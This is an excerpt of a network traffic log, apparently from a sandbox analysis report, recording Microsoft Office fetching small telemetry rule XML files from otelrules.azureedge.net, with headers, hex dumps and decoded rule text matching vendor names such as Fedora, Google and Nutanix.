                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            55192.168.2.45518213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:59 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:59 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:59 GMT
                            Content-Type: text/xml
                            Content-Length: 448
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                            ETag: "0x8DC582BB389F49B"
                            x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223859Z-16547b76f7fvllnfhC1DFWxkg80000000mb000000000b0yd
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:59 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                            Session IDSource IPSource PortDestination IPDestination Port
                            56192.168.2.45518313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:59 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:59 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:59 GMT
                            Content-Type: text/xml
                            Content-Length: 491
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                            ETag: "0x8DC582B98B88612"
                            x-ms-request-id: d6de3b9d-801e-00a0-7812-362196000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223859Z-1866b5c5fbbpxkkxhC1DFWhvmc00000000rg000000000uaa
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:59 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            57192.168.2.45518413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:59 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:59 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:59 GMT
                            Content-Type: text/xml
                            Content-Length: 416
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                            ETag: "0x8DC582BAEA4B445"
                            x-ms-request-id: 46e97820-b01e-0097-069a-364f33000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223859Z-r178fb8d7657w5c5hC1DFW5ngg000000034g000000012udk
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:59 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                            Session IDSource IPSource PortDestination IPDestination Port
                            58192.168.2.45518613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:00 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:00 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:00 GMT
                            Content-Type: text/xml
                            Content-Length: 479
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                            ETag: "0x8DC582B989EE75B"
                            x-ms-request-id: 4f50471b-101e-0079-73af-365913000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223900Z-16547b76f7f67wxlhC1DFWah9w0000000m6g00000000qmfr
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            59192.168.2.45518713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:00 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:00 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:00 GMT
                            Content-Type: text/xml
                            Content-Length: 415
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                            ETag: "0x8DC582BA80D96A1"
                            x-ms-request-id: 7f17f6e1-501e-00a3-5daf-36c0f2000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223900Z-16547b76f7fmbrhqhC1DFWkds80000000m7000000000yk44
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                            Session IDSource IPSource PortDestination IPDestination Port
                            60192.168.2.45518813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:00 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:00 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:00 GMT
                            Content-Type: text/xml
                            Content-Length: 471
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                            ETag: "0x8DC582B97E6FCDD"
                            x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223900Z-16547b76f7f76p6chC1DFWctqw0000000ma000000000s4he
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:00 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            61192.168.2.45518913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:00 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:00 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:00 GMT
                            Content-Type: text/xml
                            Content-Length: 419
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                            ETag: "0x8DC582B9C710B28"
                            x-ms-request-id: 2012891f-801e-00ac-7a8d-35fd65000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223900Z-r178fb8d765mjvjchC1DFWhkyn00000002yg00000000xqn5
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                            Session IDSource IPSource PortDestination IPDestination Port
                            62192.168.2.45519013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:00 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:00 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:00 GMT
                            Content-Type: text/xml
                            Content-Length: 477
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                            ETag: "0x8DC582BA54DCC28"
                            x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223900Z-16547b76f7f7rtshhC1DFWrtqn0000000m5g0000000107tp
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            63192.168.2.45519113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:01 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:01 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:01 GMT
                            Content-Type: text/xml
                            Content-Length: 419
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                            ETag: "0x8DC582BB7F164C3"
                            x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223901Z-16547b76f7fgvq8chC1DFWhd2w0000000120000000006x1s
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                            Session IDSource IPSource PortDestination IPDestination Port
                            64192.168.2.45519213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:01 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:01 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:01 GMT
                            Content-Type: text/xml
                            Content-Length: 477
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                            ETag: "0x8DC582BA48B5BDD"
                            x-ms-request-id: d6bc25f6-801e-00a0-4c08-362196000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223901Z-1749fc9bdbdcm45lhC1DFWeab8000000032g0000000090n4
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:01 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            65192.168.2.45519313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:01 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:01 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:01 GMT
                            Content-Type: text/xml
                            Content-Length: 419
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                            ETag: "0x8DC582B9FF95F80"
                            x-ms-request-id: 842612a7-c01e-00a2-75a0-342327000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223901Z-r178fb8d765zlhnthC1DFWvdu000000001u0000000001uan
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                            Session IDSource IPSource PortDestination IPDestination Port
                            66192.168.2.45519413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:01 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:01 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:01 GMT
                            Content-Type: text/xml
                            Content-Length: 472
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                            ETag: "0x8DC582BB650C2EC"
                            x-ms-request-id: 314abd17-c01e-0034-010b-362af6000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223901Z-1749fc9bdbdgs9sshC1DFWt6ws000000036g00000000tdhz
